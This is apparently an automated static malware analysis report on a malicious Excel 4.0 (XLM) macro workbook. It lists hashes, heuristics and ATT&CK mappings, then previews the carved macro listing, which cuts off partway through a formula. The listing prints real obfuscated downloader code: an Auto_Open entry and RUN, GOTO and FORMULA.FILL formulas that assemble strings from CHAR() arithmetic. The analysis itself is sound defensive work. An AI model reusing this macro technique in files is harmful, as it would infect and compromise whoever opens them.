Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d32455d9736e1464…

MALICIOUS

Office (OLE)

171.0 KB Created: 2020-05-13 12:29:13 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: c0c3d096d77211b70f6111d24af363b2 SHA-1: 0de5cafbaffa619cb04e4209f3808e968f55e20d SHA-256: d32455d9736e1464b5b759c50fedc1396b448619deb476e608e7ceab9d9c93d8
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open defined name, which is a known method for executing arbitrary code. The macros utilize dangerous formula APIs such as RUN and SET.VALUE, suggesting an intent to download and execute a secondary payload. The specific functions used point towards a macro-based downloader.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 130585 bytes
SHA-256: 97c3e4918a2e7e7c16a7412de0ba91e15a1a1b111febaeea9a580d663f3ebc69
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!EH17079 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,S19,"",0.67222222222222216548
'  Sheet,JN38,"",2869.00000000000000000000
'  Sheet,BE93,"",-2799.00000000000000000000
'  Sheet,EX110,"SET.VALUE(HC46079,363/5)",""
'  Sheet,EX111,GOTO(BJ51366),""
'  Sheet,CW173,"",-28.81318681318681385051
'  Sheet,EJ188,"",147.40007812499999317879
'  Sheet,HW200,"",-2.37362637362637363125
'  Sheet,HE228,"",453.50000000000000000000
'  Sheet,EF260,"",-1.41025641025641035320
'  Sheet,JH331,"",-1.15882352941176458572
'  Sheet,CQ334,"",198.00000000000000000000
'  Sheet,GR339,"",2852.00000000000000000000
'  Sheet,GI353,"SET.VALUE(JH23972,GET.CELL(50,DI58290)+-368.00000000000000000000-4)",""
'  Sheet,GI354,RUN(IL49025),""
'  Sheet,JF473,"",0.19578947368421051323
'  Sheet,GR536,"",-0.21311475409836064254
'  Sheet,JU559,"",-0.41417910447761191461
'  Sheet,CZ594,"",-0.83870967741935487094
'  Sheet,EX598,"",6.88405797101449312692
'  Sheet,DZ630,"",-5.50746268656716431167
'  Sheet,H635,"",404.00000000000000000000
'  Sheet,CZ663,"",-0.44262295081967212296
'  Sheet,EZ675,"",0.07960199004975124226
'  Sheet,JG757,"",-6.10000488281249975131
'  Sheet,JJ774,"",429.00000000000000000000
'  Sheet,JQ779,"",431.00000000000000000000
'  Sheet,BX824,"",322.00000000000000000000
'  Sheet,CB949,"",-2.16666666666666651864
'  Sheet,EB973,"",0.67850467289719618158
'  Sheet,FP989,"",-6.70000488281250028422
'  Sheet,BJ1047,"",285.00000000000000000000
'  Sheet,FJ1066,"",313.00000000000000000000
'  Sheet,G1158,"",-98.75000000000000000000
'  Sheet,CW1163,"",265.00000000000000000000
'  Sheet,JF1171,"",-18.75000000000000000000
'  Sheet,M1225,"",-30.75000000000000000000
'  Sheet,CZ1274,"",0.02714776632302405568
'  Sheet,FI1307,"",0.31272727272727274261
'  Sheet,BE1308,"",-293.00000000000000000000
'  Sheet,GR1403,"",-3.13043478260869578733
'  Sheet,IX1409,"",-32.77501953125000255795
'  Sheet,GG1415,"",314.00000000000000000000
'  Sheet,FC1441,"",-2856.00000000000000000000
'  Sheet,HI1481,"",-315.00000000000000000000
'  Sheet,DO1483,"",-0.18852459016393441349
'  Sheet,JB1507,"",10.25510204081632714690
'  Sheet,ID1523,"",-247.00000000000000000000
'  Sheet,Q1556,"",-0.43032786885245899455
'  Sheet,EE1558,"",589.00000000000000000000
'  Sheet,F1621,"",-9.22500488281250063949
'  Sheet,DK1636,"",-309.00000000000000000000
'  Sheet,BE1658,"",-1.01025641025641021997
'  Sheet,IX1658,"",-0.37962962962962965019
'  Sheet,HT1692,"",214.00000000000000000000
'  Sheet,BD1800,"",-0.03127383676582761590
'  Sheet,ET1801,"FORMULA.FILL(CHAR(HR39641+G19229)&CHAR(DQ6366+DE21491)&CHAR(EK12587*EI24396)&CHAR(IF40813+IR28440)&CHAR(JC16649+BJ1047)&CHAR(EK12587*IU44129)&CHAR(JH23972*GJ51208)&CHAR(IF40813/DU63381)&CHAR(DQ6366/EN45003)&CHAR(JC16649+IX53149)&CHAR(DC38998/DL2681)&CHAR(IU35778+EB28757)&CHAR(DQ6366+IF21002)&CHAR(DO8517*HB46889)&CHAR(EA20210-Q37130)&CHAR(EK12587*FU61017)&CHAR(JH23972+GI36796)&CHAR(IF40813-FM35408)&CHAR(EA20210-DF64003)&CHAR(JH23972-GH4116)&CHAR(HR39641*FN20562)&CHAR(EA20210*DW51344),ET1802)",""
'  Sheet,ET1803,GOTO(GO4355),""
'  Sheet,F1815,"",-0.40163934426229508379
'  Sheet,HS1841,"",-430.00000000000000000000
'  Sheet,EF1898,"",10.79545454545454497008
'  Sheet,HN1898,"",6.98529411764705887578
'  Sheet,GD1923,"",-0.41393442622950821219
'  Sheet,HM1942,"",134.50000000000000000000
'  Sheet,CV1981,"FORMULA.FILL(CHAR(DU57124+Q41384)&CHAR(DQ22215+HW12711)&CHAR(JF7021/FD41122)&CHAR(DJ27233/T34888)&CHAR(DQ22215+FB39865)&CHAR(JS22779+H53258)&CHAR(JP52329-HV39723)&CHAR(DQ22215-Z4771)&CHAR(P20963+JK61516)&CHAR(JP52329*HO55806)&CHAR(HC46079/S19)&CHAR(JP52329+BV39906)&CHAR(DJ27233/CA45189)&CHAR(HC46079/EB973)&CHAR(DJ27233+FA52414)&CHAR(CB27422/ED26759)&CHAR
... (truncated)